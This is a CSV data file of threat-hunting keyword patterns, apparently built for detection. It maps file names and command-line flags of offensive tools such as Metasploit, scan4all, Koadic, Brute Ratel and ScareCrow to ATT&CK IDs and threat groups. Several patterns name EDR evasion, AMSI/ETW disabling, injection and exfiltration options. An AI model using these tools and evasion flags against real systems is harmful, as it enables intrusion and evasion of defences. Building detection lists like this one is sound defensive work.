-*sc0tfree/updog*,greyware_tool_keyword,updog,Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.,T1567 - T1074.001 - T1020,TA0010 - TA0009,N/A,N/A,Data Exfiltration - Collection,https://github.com/sc0tfree/updog,1,1,N/A,9,10,2653,289,2023-09-26T06:56:15Z,2020-02-18T15:29:21Z
-*scada_default_userpass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*scan -T list_of_targets.txt*,offensive_tool_keyword,Osmedeus,Osmedeus - A Workflow Engine for Offensive Security,T1595,TA0043,N/A,N/A,Exploitation Tools,https://github.com/j3ssie/osmedeus,1,0,N/A,N/A,10,4712,845,2023-09-16T05:02:26Z,2018-11-10T04:17:18Z -*scan4all -*.xml*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all -h*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*scan4all -tp *,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation 
tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*scan4all.51pwn.com*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*scan4all_*.*_linux_amd64.zip*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*scan4all_*.*_macOS_amd64.zip*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*scan4all_*.*_macOS_arm64.zip*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z 
-*scan4all_*.*_windows_amd64.zip*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*scan4all_windows_386.exe*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*scan4all_windows_amd64.exe*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*scan4all-main*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z
-*scanless*,offensive_tool_keyword,scanless,This is a Python 3 command-line utility and library for using websites that can 
perform port scans on your behalf,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0008,N/A,N/A,Information Gathering,https://github.com/vesche/scanless,1,0,N/A,N/A,10,1073,176,2023-08-07T15:12:42Z,2017-05-05T02:53:01Z -*scanner/backdoor*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*scannerport.go -*,offensive_tool_keyword,GONET-Scanner,port scanner and arp discover in go,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/GONET-Scanner,1,0,N/A,N/A,1,72,18,2022-03-10T04:35:58Z,2022-02-02T19:39:09Z -*Scanners-Box*,offensive_tool_keyword,Scanners-Box,Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. 
aircrack-ng will not be included in the scope of collection.,T1190 - T1210.001 - T1595 - T1192,TA0007 - TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/We5ter/Scanners-Box,1,0,N/A,N/A,10,7644,2353,2023-08-09T07:09:32Z,2016-12-24T16:07:50Z -*ScanProcessForBadgerConfig*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ScanTCPImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*ScareCrow *-loader *,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -encryptionmode *,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* 
-Evasion*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -Exec*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -injection*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -Loader * ,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -noamsi*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -noetw*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow* -obfu*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*_darwin_amd64*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*_windows_amd64.exe*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*KnownDLL*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*ProcessInjection*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow*windows_amd64.exe*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GeorgePatsias/ScareCrow-CobaltStrike,1,1,N/A,10,10,437,68,2022-07-15T09:39:18Z,2021-06-24T10:04:01Z -*ScareCrow.go*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow/Cryptor*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 